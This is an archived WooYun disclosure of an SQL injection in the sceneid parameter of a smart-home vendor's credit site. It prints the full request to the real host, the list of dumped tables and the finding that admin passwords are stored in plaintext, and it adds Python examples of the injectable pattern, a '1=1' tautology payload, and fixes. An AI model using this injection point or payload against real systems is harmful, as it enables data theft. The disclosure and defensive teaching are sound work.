WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------------------- http://drop.zone.ci/
2016-02-03: Details have been sent to the vendor and are awaiting vendor handling. 2016-02-22: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
As the title says.
Thought a server that is only ever accessed by the app would be safe from attack? The problem page:
GET /KCredit/index.php/Home/Scene/showSceneDetail?sceneid=1333&[email protected] HTTP/1.1
Host: kcredit.ikonke.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kcredit.ikonke.com/KCredit/index.php/Home/Scene/[email protected]
Cookie: PHPSESSID=meacp7b9un0bt9sr9dai11ug55
Connection: keep-alive
The sceneid parameter is injectable. Running it shows that quite a few tables are involved:
Database: kcredit
[27 tables]
+-------------------------+
| tb_activity             |
| tb_activityregistration |
| tb_ad                   |
| tb_admin                |
| tb_aliorderlog          |
| tb_blacklist            |
| tb_coupon               |
| tb_guessing             |
| tb_guessingbid          |
| tb_guessingoption       |
| tb_indexad              |
| tb_kmoneyhistory        |
| tb_message              |
| tb_order                |
| tb_product              |
| tb_promotion            |
| tb_promotioncode        |
| tb_promotioncodeused    |
| tb_scene                |
| tb_scenecomment         |
| tb_scenedownloadrecord  |
| tb_tempcreditrecord     |
| tb_templog              |
| tb_user                 |
| tb_usercoupon           |
| tb_usereventlog         |
| tb_zanhistory           |
+-------------------------+
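The root cause described above is a request parameter spliced straight into SQL text. The following is an added example (not code from the report or from the vendor) that reproduces the bug class against a constructed in-memory SQLite table named after the report's tb_scene, and places the hardened version beside it: the id is validated as an integer and then bound as a query parameter, so the value can no longer change the statement. Table columns, rows and function names are assumptions for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample data: a tb_scene table with three invented rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tb_scene (sceneid INTEGER PRIMARY KEY, name TEXT, owner_email TEXT)"
    )
    conn.executemany(
        "INSERT INTO tb_scene VALUES (?, ?, ?)",
        [
            (1333, "Living room lights", "alice@example.com"),
            (1334, "Bedroom heater", "bob@example.com"),
            (1335, "Front door lock", "carol@example.com"),
        ],
    )
    return conn


def show_scene_vulnerable(conn, sceneid):
    """The bug class from the report: the raw query-string value is concatenated
    into the SQL, so anything other than a bare number rewrites the WHERE clause."""
    sql = "SELECT sceneid, name, owner_email FROM tb_scene WHERE sceneid = " + sceneid
    return conn.execute(sql).fetchall()


def show_scene_safe(conn, sceneid):
    """Hardened form: reject non-integer input up front, then bind the value as a
    parameter. The database receives the statement and the value separately."""
    try:
        sid = int(sceneid)
    except (TypeError, ValueError):
        raise ValueError("sceneid must be an integer")
    sql = "SELECT sceneid, name, owner_email FROM tb_scene WHERE sceneid = ?"
    return conn.execute(sql, (sid,)).fetchall()


def row_count(func, sceneid):
    """Helper for comparing the two implementations on the same input."""
    conn = make_db()
    try:
        return len(func(conn, sceneid))
    except ValueError:
        return -1  # input rejected before any query ran
    finally:
        conn.close()


if __name__ == "__main__":
    # A well-formed id behaves the same in both versions.
    print("vulnerable, 1333:", row_count(show_scene_vulnerable, "1333"))
    print("safe, 1333:      ", row_count(show_scene_safe, "1333"))
    # A tautology appended to the id exposes every row in the vulnerable version
    # and is rejected outright by the safe version.
    print("vulnerable, tautology:", row_count(show_scene_vulnerable, "1333 OR 1=1"))
    print("safe, tautology:      ", row_count(show_scene_safe, "1333 OR 1=1"))
```

The integer check is the cheap first line of defence for an id parameter; the bound parameter is what actually removes the injection, and it works equally well for string-typed inputs such as the email parameter in the same request.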
It contains information on a large number of users.
The administrator account passwords are, unbelievably, stored in plaintext.
Take care to do proper filtering and the like... The security of smart hardware is extremely important; the security of these smart devices can directly affect people's physical safety...
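Plaintext admin credentials, as found in tb_admin above, mean that a single injection hands over every account. The following added example (not code from the report or the vendor) shows the storage format that limits the damage: a salted, iterated PBKDF2-HMAC-SHA256 hash using only the Python standard library, with a constant-time comparison on verification. The encoded string layout and the iteration count are assumptions chosen for the demonstration.

```python
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 200_000  # assumed work factor; tune upward as hardware allows


def hash_password(password, salt=None):
    """Return an encoded record "algorithm$iterations$salt_hex$digest_hex".

    Each password gets its own random 16-byte salt, so identical passwords in
    tb_admin or tb_user no longer produce identical stored values.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "$".join([ALGORITHM, str(ITERATIONS), salt.hex(), digest.hex()])


def verify_password(password, stored):
    """Recompute the hash from the stored salt and iteration count and compare
    it in constant time, so a mismatch does not leak where the digests diverge."""
    try:
        algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algorithm != ALGORITHM:
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def looks_like_plaintext(stored):
    """Migration aid: flag a stored credential that is not in the encoded
    hash format, so existing plaintext rows can be rehashed at next login."""
    parts = stored.split("$")
    return not (len(parts) == 4 and parts[0] == ALGORITHM and parts[1].isdigit())


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print("stored:", record)
    print("verify correct:", verify_password("correct horse battery staple", record))
    print("verify wrong:  ", verify_password("wrong password", record))
    print("plaintext row? ", looks_like_plaintext("admin123"))
```

On a legacy table the usual migration is to check each row with looks_like_plaintext at login time, verify the submitted password against the old value, and overwrite it with hash_password's output, so no plaintext needs to be read outside that one request.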
Severity: No impact (vendor ignored)
Ignored at: 2016-02-22 02:30
Vulnerability Rank: 15 (WooYun rating)
None yet